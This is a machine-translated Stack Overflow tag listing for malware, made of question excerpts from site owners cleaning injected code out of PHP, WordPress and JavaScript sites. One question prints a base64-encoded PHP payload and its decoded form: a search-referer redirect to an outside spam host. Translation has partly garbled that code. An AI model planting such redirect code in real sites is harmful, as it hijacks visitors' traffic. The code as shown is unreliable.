问题标签 [malware]

For questions regarding programming in ECMAScript (JavaScript/JS) and its various dialects/implementations (excluding ActionScript). Note JavaScript is NOT the same as Java! Please include all relevant tags on your question; e.g., [node.js], [jquery], [json], [reactjs], [angular], [ember.js], [vue.js], [typescript], [svelte], etc.

0 投票
4 回答
3430 浏览

javascript - 从网站中删除恶意软件

我的网站 3dsforums.com 已被标记为包含恶意软件的攻击站点。根据谷歌网站管理员工具,这是被注入到每个页面的可疑代码:

因此,我有两个问题:

这实际上是违规代码吗?

以及如何删除它?

我似乎无法通过 vBulletin 中的模板或通过 phpmyadmin 找到它,所以我不知道应该做什么。

谢谢你的帮助。

0 投票
1 回答
546 浏览

php - 在 CakePHP 站点中发现的隐藏脚本

我有一个使用 CakePHP 框架的网站,趋势科技在该网站中检测到恶意软件,它的作用是将 iframe 放在其中一个文件的顶部,问题是我找不到那些 iframe/代码。我确实遇到过这种恶意软件,黑客会在 index.php 文件中注入代码,但这次真的不同。以下是趋势科技发现的屏幕截图:

在此处输入图像描述

如果您看一下,有一个名为 adimgsn07.co.in/k 的源站点,如果您打开该站点,它会在我的末尾显示类似“坏国家”的内容。

有没有人遇到过这个问题?

谢谢!

0 投票
0 回答
221 浏览

javascript - 某些浏览器可以将 JavaScript 标识符中的非 ASCII 字符自动转换为相应的 ASCII 字符吗?

我一直在观察最近开始注入有缺陷的恶意脚本版本的恶意软件攻击。他们在过去 3 周内使用该脚本,我开始怀疑这是否真的是一个错误,或者他们只是针对某些浏览器的 JS 引擎的“功能”。

以下是详细信息:

恶意脚本(此处为完整版本:http: //pastebin.com/zQWepqtz)生成以wÍndow.gloa=(function()....注意Í而不是i in window开头的代码。该恶意脚本的先前工作版本生成了正确的window.gloa=(function()...代码。

问题:某些浏览器是否可以“考虑” wÍndow实际上与window相同并执行该代码?

0 投票
2 回答
4349 浏览

python - 用于检测恶意软件网站的 Python 脚本或用于检测网站上的恶意软件的程序?

我很想知道恶意软件检测(如谷歌的安全浏览)技术是如何工作的?谷歌搜索对我的事业没有帮助。我发现了一些叫做cuckoobox的东西,它可以做这样的事情。

网站的恶意软件检测究竟是如何工作的?那可能是什么算法?谷歌安全浏览等使用什么算法?

任何可用的python脚本?

0 投票
2 回答
1140 浏览

php - 这个恶意软件代码完成了什么?

我发现这段代码注入了客户网站上的许多 PHP 文件中。当然,原件已被混淆和编码。我已经设法对其进行解码并将其格式化为当前形式。

我的问题是:它到底完成了什么,代码是否暗示了它是如何注入的,从而阐明了如何在未来防止这种情况发生?

0 投票
1 回答
499 浏览

php - 我从这个恶意代码中损失了多少?

今年 2 月 14 日,我的网站受到了一些恶意软件代码的攻击,这些恶意软件代码在 2 月 29 日谷歌采取行动后引起了我的注意,但是所有 php 文件在检查时都受到了恶意代码的影响,我得到了以下代码

回声 base64_decode("/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vbmFtZXN0aS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9");

在解码它变成

错误报告(0);$qazplm = headers_sent(); if (!$qazplm) { $referer = $_SERVER['HTTP_REFERER']; $uag = $_SERVER['HTTP_USER_AGENT']; if ($uag) { if (stristr($referer, "yahoo") or stristr($referer, "bing") or stristr($referer, "rambler") or stristr($referer, "gogo") or stristr( $referer, "live.com") 或 stristr($referer, "aport") 或 stristr($referer, "nigma") 或 stristr($referer, "webalta") 或 stristr($referer, "begun.ru" ) 或 stristr($referer, "stumbleupon.com") 或 stristr($referer, "bit.ly") 或 stristr($referer, "tinyurl.com") 或 preg_match("/yandex.ru/yandsearch\?( .*?)\&lr\=/", $referer) 或 preg_match("/google.(.*?)/url/",http://namesti.bee.pl/ "); exit(); } } } }

我不知道它是如何进入我的服务器的,但是所有 php 文件都已生效,但其他文件都很好。整个网站现在都关闭了。我只想知道它会造成多大的伤害以及这段代码到底做了什么。我怎样才能检测到它。它是在特定时间执行的脚本吗?

0 投票
1 回答
429 浏览

malware - JS 文件中出现的恶意软件

某些东西正在自动编辑我们网站的全局 JS 文件以包含恶意软件。一次一个地对文件进行 CHMODing 到 777,然后附加代码。它从一个文件开始,但现在已移动到两个文件。该站点位于运行 PHP/mySQL/JQuery 的 apache 服务器上

这是一场噩梦,这种行为是否暗示了任何特定类型的漏洞利用(FTP?JS?SQL?)恶意软件导致“黑洞漏洞利用”

0 投票
1 回答
1517 浏览

windows - 调试注入的线程

我需要调试恶意软件注入 Internet Explorer 的代码。如果我可以调试主进程本身就没有问题,问题是由于许多反调试措施,我无法从调试器内部运行恶意软件(此外,注入不是通过 CreateRemoteThread 执行的,也不是通过 NtQueueApcThread 执行的,即本身就很有趣,这也是我想弄清楚的)。

有没有办法将调试器附加到注入的进程?我可以使用 OllyDbg 检测到我感兴趣的线程,但是我无法附加到代码上来执行它并了解正在发生的事情。

你有什么建议吗?提前谢谢!

0 投票
3 回答
464 浏览

wordpress - Wordpress 网站似乎没有恶意软件,但点击 Google 搜索结果会重定向到垃圾邮件网站

我遇到了一个涉及 WP 环境中的恶意软件的问题。当我在 Google 中搜索品牌并单击相应链接时,我被重定向到第三方垃圾邮件站点。

这种情况已经发生了一段时间(超过一周),但我的网站还没有被列入谷歌的黑名单。此外,像 Norton Safeweb 等网站扫描程序都声称该网站没有受到威胁。

额外细节:

我发现并删除了一些可疑的 PHPeval()函数,然后在我的页面和数据库中搜索并替换了任何剩余的代码。在该网站被 Google 清除为非黑名单状态后,我认为一切都结束了,运行更新并采取了许多措施来保护该网站免受未来的感染。

但是问题仍然存在。

0 投票
1 回答
335 浏览

php - 有人能告诉我更多关于这个恶意脚本的信息吗?

这在前几天的一次黑客攻击中被注入我的网站,我解密它并得到这个:有人可以告诉我它是做什么的吗?

编辑:不要去 IP 地址,它们也可能是恶意的。